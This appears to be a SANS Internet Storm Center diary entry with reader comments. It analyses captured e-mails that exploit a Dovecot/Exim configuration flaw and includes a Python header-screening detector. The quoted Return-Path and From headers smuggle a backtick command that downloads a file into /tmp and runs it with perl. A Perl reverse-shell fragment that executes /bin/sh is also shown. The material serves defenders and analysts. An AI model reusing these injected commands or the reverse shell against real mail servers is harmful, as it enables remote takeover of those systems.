SANS ISC InfoSec Forums

Dovecot / Exim Exploit Detects

Sometimes it doesn't take an IDS to detect an attack; just reading your e-mail will do. Our reader Timo sent along these two e-mails he received, showing exploitation of a recent Dovecot/Exim configuration flaw [1]:

Return-Path: <x`wget${IFS}-O${IFS}/tmp/${IFS}``perl${IFS}/tmp/`>
X-Original-To: postmaster@localhost
Delivered-To: postmaster@localhost
Received: from domain.local ( [])
       by [REMOVED]

Return-Path: <x`wget${IFS}-O${IFS}/tmp/${IFS}``perl${IFS}/tmp/`>
X-Original-To: postmaster@localhost
Delivered-To: postmaster@localhost
Received: from domain.local ( [])
       by [REMOVED]

The actual exploit happens in the "Return-Path" line. If Exim is used as a mail server, it can be configured to "pipe" messages to an external program in order to allow for more advanced delivery and filtering options. A common configuration includes the mail delivery agent Dovecot, which also implements a POP3 and IMAP server. Sadly, the sample configuration provided for using Dovecot with Exim passes the string the attacker supplied as "MAIL FROM" in the e-mail envelope to the delivery command as a shell parameter without additional validation.

The first script ("exim") is a little one-liner shell connecting to port 9 on (reformatted for readability):

use Socket;
if(connect(S,sockaddr_in($p,inet_aton($i)))) {
exec("/bin/sh -i");};

The second script first retrieves a Perl script and then executes it. The Perl script implements a simple IRC client connecting to on port 3303 (right now, this resolves to, but it is not responding on port 3303).
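A defender-side check for this pattern, added here as an example and not part of the original diary: it screens a message's sender headers for shell constructs like the ones in the quoted e-mails and renders the ${IFS} trick readable for an analyst. The sample header blocks are constructed from the headers quoted above (URLs stay stripped, as in the diary); the alice@example.org address and the helper names are assumptions.

```python
import re
from email.parser import HeaderParser

# Constructed sample header blocks, modelled on the ones quoted in the diary.
# The diary had already stripped the download URLs, so they stay stripped here.
SAMPLE_HEADERS = """\
Return-Path: <x`wget${IFS}-O${IFS}/tmp/${IFS}``perl${IFS}/tmp/`>
X-Original-To: postmaster@localhost
Delivered-To: postmaster@localhost
Received: from domain.local ( [])
\tby [REMOVED]
"""
BENIGN_HEADERS = """\
Return-Path: <alice@example.org>
Delivered-To: postmaster@localhost
"""

# Shell constructs that never belong in an envelope sender. RFC 5322 atext
# does permit "`", "$", "{" and "}" in a local part, so this is a heuristic
# for abuse, not a syntax check; the ${IFS} plus backtick combination is the tell.
SHELL_PATTERNS = {
    "backtick":      re.compile(r"`"),
    "cmd_subst":     re.compile(r"\$\("),
    "ifs_expansion": re.compile(r"\$\{?IFS\}?"),
    "separator":     re.compile(r"[|;&]"),
}
SENDER_FIELDS = ("Return-Path", "From", "Sender")

def decode_ifs(value):
    """Render ${IFS} / $IFS as a space so the intended command becomes readable."""
    return re.sub(r"\$\{?IFS\}?", " ", value)

def sender_findings(raw_headers):
    """Return a list of (field, pattern_name) hits over the sender headers."""
    msg = HeaderParser().parsestr(raw_headers)   # unfolds continuation lines
    findings = []
    for field in SENDER_FIELDS:
        for value in msg.get_all(field, []):
            value = value.strip()
            if value.startswith("<") and value.endswith(">"):
                value = value[1:-1]              # Return-Path is always bracketed
            for name, pat in SHELL_PATTERNS.items():
                if pat.search(value):
                    findings.append((field, name))
    return findings

def is_suspicious(raw_headers):
    return bool(sender_findings(raw_headers))

if __name__ == "__main__":
    for field, name in sender_findings(SAMPLE_HEADERS):
        print(f"{field}: {name}")
    print("decoded:", decode_ifs(SAMPLE_HEADERS.splitlines()[0]))
```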

For more details, see the write-up by RedTeam Pentesting [2].


Johannes B. Ullrich, Ph.D.
SANS Technology Institute

4304 Posts
ISC Handler
Jul 29th 2013
Quick addition: the {IFS} string replaces the white space. IFS is the Unix environment variable for the separator.

4304 Posts
ISC Handler
Hi Guys,

Shortly after Heise reported this ( the server behind ( got shut down by the hoster (Strato).

Mon, 29 Jul 2013 17:57:01 +0200 (CEST) I got a new mail ...
Received: from domain.local (unknown [])
for <postmaster@localhost>; Mon, 29 Jul 2013 17:56:35 +0200 (CEST)
Date: Mon, 29 Jul 2013 17:57:01 +0200 (CEST)
From: x`wget${IFS}-O${IFS}/tmp/${IFS}``perl${IFS}/tmp/`
To: undisclosed-recipients:;
1 Posts
The use of IFS is weird. The default value of IFS is the string containing: a space followed by a tab and then a newline.
Would have expected something more like


146 Posts